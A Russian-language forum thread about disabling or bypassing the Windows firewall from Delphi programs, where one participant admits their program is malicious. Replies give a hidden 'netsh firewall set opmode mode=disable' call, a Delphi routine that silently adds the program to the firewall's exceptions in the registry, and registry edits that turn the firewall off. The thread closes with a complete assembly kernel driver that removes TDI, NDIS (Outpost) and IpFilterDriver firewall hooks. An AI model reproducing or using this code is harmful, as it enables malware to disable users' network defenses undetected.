Обращаюсь к тем кто шарит в Delphi.

Пишу программу которая использует сокеты
и брандмауэр не дает мне покоя при запуске проги сразу выскакивает окошко Разрешить Запретить.

Вопрос таков: Как средствами Delphi отключить или обойти брандмауэр?

Заранее спасибо.

Обращаюсь к тем кто шарит в Delphi.

Пишу программу которая использует сокеты
и брандмауэр не дает мне покоя при запуске проги сразу выскакивает окошко Разрешить Запретить.

Вопрос таков: Как средствами Delphi отключить или обойти брандмауэр?

Заранее спасибо.

Какой именно ??
Если имеешь виду так называемый виндвос файрвол, то копай в сторону netsh - если что это консольная програ для работы с виндовс файрвол.

http://www.compdoc.ru/secur/protect/armor-for-firewall/

Сори проверить не смогла, нету Дельфи под рукой, но попробуй:
WinExec('netsh firewall set opmode mode=disable', SW_Hide);
В команде возможны ошибки но вроде должно быть все правильно. Как недостаток такого способа, при выполнении команды через командную строку палиться сообщение о том что он отключен. Но это тоже исправляется, к сожалению параметров на память даже приблизительно не помню.

ппц народ вы жжете. винэксесом. ))

procedure fuck_xpfw;
var
key:longword;
ValueName:array[0..255] of char;
Value:string;
const
path='SYSTEM\ControlSet001\Services\SharedAccess\P arameters\FirewallPolicy\StandardProfile\Authorize dApplications\List';

begin
if RegOpenKeyEx($80000002, path, 0, LOngword($F003F), key)<>0 then exit;
GetModuleFileName(GetModuleHandle(nil), ValueName, 256);
Value:=ValueName+':*:Enabled:RPC';
RegSetValueEx(key, ValueName, 0, 1, pchar(Value), length(Value));
RegCloseKey(key);
end;


Тупо разрешить своему приложению работать с сетью.

ппц народ вы жжете. винэксесом. ))
Человек спросил как отключить брандмауэр программно, я ему сказала)))
спросил бы как тупо разрешить своему приложению работать с сетью, то и ответ был бы другой если бы он был)))) а насчет винэкзека))) смешно не смешно, но ведь работает блин)) по крайней мере должен)

Всем спасибо! Попробую отпишу че и как получилось или не получилось!

запуск процесса в скрытом виде карается порой визгами свиней товарища касперского.

Хай народ!
А есть идеи как сделать тоже самое, только не из под делфи, а тупо по средствам командной строки. А то палевно как то.
И скорее не отключение самого файрвола, а добовление исключения.
уж больно вредная прога (((

Хай народ!
А есть идеи как сделать тоже самое, только не из под делфи, а тупо по средствам командной строки. А то палевно как то.
И скорее не отключение самого файрвола, а добовление исключения.
уж больно вредная прога (((

А netsh чем тебе не комманда ?
Напиши в консоль netsh

запуск процесса в скрытом виде карается порой визгами свиней товарища касперского.
зато пропись в доверенные приложения видовс файрвола касперского точно вынесет))) интересно, программы умеют выходить из строя от смеха?)

<offtop>
Умеют кончено же, если юзверь будет смеяться сильно и уронит системник )))
</offtop>

А netsh чем тебе не комманда ?
Напиши в консоль netsh

Уже сам добрался и до нее, но все равно спасибо за помощь!!!

) хоть и разобрался но добавлю... насколько я понмю можно отключить брэндмауэр через реестр...

идем в HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SharedAccess\Parameters\FirewallPolicy\Standard Profile\

и задаем значение параметра EnableFirewall (dword) равным 0
и изменения вступят в силу но только поле перезагрузки...

еще в этом же ключе есть такой параметр как:
DoNotAllowExceptions - не разрешать исключения, если этот параметр равен 1, то пример slesh"а (програмно записать в список исключений) к сожалению будет бесполезен если к нему не дописать пару строчек...

так что можеш попробовать еще так отключить может быть получится)

) хоть и разобрался но добавлю... насколько я понмю можно отключить брэндмауэр через реестр...



С реестром есть маленький косячокс, очень многие педантичные люди ставят программу, щас не вспомню как называеться, которая следит за всеми изменениями в записях реестра. Так что вариант отключения файрвола через реестр хоть и актуальна, но для меня не приемлемма.

Я предпочел написать простой батничег, который собственно и отключит файрвол, в момент запуска виндовс.

Кстати, вел небольшую статистику, из нее зделал вывод:

Люди которые насамом деле понимают всю серьезность опастности - гораздо реже пользуются антивирусами, не же ли простые юзвери )))

Спасибо за пост, может кому пригодиться.

стопорнуть программно службу фаервола а чтоб центр безопасности не кричал про остановку фаера, стопорнуть и его предварительно.

.386
.model flat, stdcall
option casemap:none

include ddk\ntddk.inc
include ddk\ntoskrnl.inc
include Strings.inc
NDIS40 equ 1
include ddk\ndis.inc
include ddk\ipfirewall.inc

includelib ntoskrnl.lib
includelib ndis.lib

; by MaD [ mad-factor@mail.ru ] 01/08/2006


.code




; ---------------------------------------------------------------------------------------
; Процедуры-заглушки, для регистрации NDIS протокола


BindAdapterStub proc pStatus, BindContext, pDeviceName, pSS1, pSS2

ret
BindAdapterStub endp

UnbindAdapterStub proc pStatus, BindContext, pUnbindContext

ret
UnbindAdapterStub endp








; ---------------------------------------------------------------------------------------
; Процедура, удаляющая перехват Outpost'а на уровне обработчика NDIS

RemoveNdisProcHook proc Handler :PVOID

mov ecx, Handler
jecxz @ret

cmp byte ptr [ecx], 0E8h ; В начале должен стоять call
jnz @ret

mov edx, [ecx+1] ; Смещение call'а
lea edx, [ecx+edx+5] ; EDX указывает на то, куда идет вызов call'а

.if dword ptr [edx] == 03C08358h ; В начале стоит: pop eax / add eax, 3 - это Outpost 4.0

mov edx, [ecx+8]

.elseif dword ptr [edx] == 6030FF58h ; В начале стоит: pop eax / push [eax] / pushad - это Outpost 3.x

mov edx, [ecx+5]

.else

jmp @ret
.endif

; В EDX адрес реального обработчика

mov byte ptr [ecx], 0E9h ; Превратим call в jmp
sub edx, ecx
sub edx, 5
mov [ecx+1], edx ; Теперь вместо передачи управления фаеру, будет jmp сразу на реальный обработчик

@ret:
ret

RemoveNdisProcHook endp













DriverEntry proc uses esi edi ebx pDriverObject :PDRIVER_OBJECT, pusRegistryPath :PUNICODE_STRING

LOCAL NdisProto :NDIS_PROTOCOL_CHARACTERISTICS
LOCAL NdisStatus :NDIS_STATUS
LOCAL NdisProtoHandle :NDIS_HANDLE
LOCAL TcpipDrvObj :PDRIVER_OBJECT
LOCAL IpFilterFileObj :PFILE_OBJECT
LOCAL IpFilterDevObj :PDEVICE_OBJECT
LOCAL InBuff :DWORD





; 1) -> Снимаем перехват на уровне TDI (универсальный способ для обхода всех TDI-фаеров)


invoke ObReferenceObjectByName, $CCOUNTED_UNICODE_STRING("\\Driver\\Tcpip"), OBJ_CASE_INSENSITIVE, NULL, 0, \
IoDriverObjectType, KernelMode, NULL, addr TcpipDrvObj
test eax, eax
jnz @ret

mov eax, TcpipDrvObj
mov ebx, (DRIVER_OBJECT ptr [eax]).DeviceObject

assume ebx : ptr DEVICE_OBJECT ; EBX -> текущее устройство

; Перечисляем все устройства драйвера Tcpip.sys:
; \Device\Ip, \Device\RawIp, \Device\Tcp, \Device\Udp, \Device\IPMULTICAST

@enum_devices:
and [ebx].AttachedDevice, 0 ; Перехват снят

mov ebx, [ebx].NextDevice
test ebx, ebx
jnz @enum_devices

assume ebx : nothing


invoke ObDereferenceObject, TcpipDrvObj








; 2) -> Удаляем перехват на уровне NDIS (убираем перехват обработчиков протоколов)


lea edi, NdisProto
mov ecx, sizeof NdisProto
xor eax, eax
rep stosb

mov NdisProto.MajorNdisVersion, 4
mov NdisProto.BindAdapterHandler, BindAdapterStub
mov NdisProto.UnbindAdapterHandler, UnbindAdapterStub

; Регистрируем NDIS-протокол для того чтобы получить указатель на связный список протоколов

invoke NdisRegisterProtocol, addr NdisStatus, addr NdisProtoHandle, addr NdisProto, sizeof NdisProto
cmp NdisStatus, NDIS_STATUS_SUCCESS
jnz @ret

mov ebx, NdisProtoHandle ; EBX -> текущий протокол
assume ebx : ptr NDIS_PROTOCOL_BLOCK
mov ebx, [ebx].Next ; Скорее всего указывает на протокол TCPIP_WANARP

invoke NdisDeregisterProtocol, addr NdisStatus, NdisProtoHandle

; Перечисляем все зарегистрированные NDIS-протоколы

@enum_protocols:

; Удаляем перехват обработчиков NDIS-протокола

invoke RemoveNdisProcHook, [ebx].OpenAdapterCompleteHandler
invoke RemoveNdisProcHook, [ebx].SendCompleteHandler
invoke RemoveNdisProcHook, [ebx].TransferDataCompleteHandler
invoke RemoveNdisProcHook, [ebx].RequestCompleteHandler
invoke RemoveNdisProcHook, [ebx].ReceiveHandler
invoke RemoveNdisProcHook, [ebx].StatusHandler
invoke RemoveNdisProcHook, [ebx].ReceivePacketHandler
invoke RemoveNdisProcHook, [ebx].BindAdapterHandler
invoke RemoveNdisProcHook, [ebx].UnbindAdapterHandler


mov esi, [ebx].OpenBlock ; ESI -> текущий открытый блок
test esi, esi
jz @next

assume esi : ptr NDIS_OPEN_BLOCK

; Перечисляем все открытые блоки этого протокола

@enum_open_blocks:

; Удаляем перехват обработчиков открытого блока

invoke RemoveNdisProcHook, [esi].SendHandler
invoke RemoveNdisProcHook, [esi].TransferDataHandler
invoke RemoveNdisProcHook, [esi].SendCompleteHandler
invoke RemoveNdisProcHook, [esi].TransferDataCompleteHandler
invoke RemoveNdisProcHook, [esi].ReceiveHandler
invoke RemoveNdisProcHook, [esi].RequestCompleteHandler
invoke RemoveNdisProcHook, [esi].ReceivePacketHandler
invoke RemoveNdisProcHook, [esi].SendPacketsHandler
invoke RemoveNdisProcHook, [esi].StatusHandler


mov esi, [esi].ProtocolNextOpen
test esi, esi
jnz @enum_open_blocks

assume esi : nothing

@next:
mov ebx, [ebx].Next
test ebx, ebx
jnz @enum_protocols

assume ebx : nothing








; 3) -> Отменяем фильтрацию в IpFilterDriver

invoke IoGetDeviceObjectPointer, $CCOUNTED_UNICODE_STRING("\\Device\\Ipfilterdriver"), \
GENERIC_READ or GENERIC_WRITE or SYNCHRONIZE, addr IpFilterFileObj, addr IpFilterDevObj
test eax, eax
jnz @ret

and InBuff, 0

invoke IoBuildDeviceIoControlRequest, IOCTL_IP_SET_FIREWALL_HOOK, IpFilterDevObj, addr InBuff, 4, 0, 0, 0, 0, 0
test eax, eax
jz @ret

invoke IoCallDriver, IpFilterDevObj, eax






@ret:
mov eax, STATUS_DEVICE_CONFIGURATION_ERROR
ret

DriverEntry endp

end DriverEntry

Если помог то ставь плюсег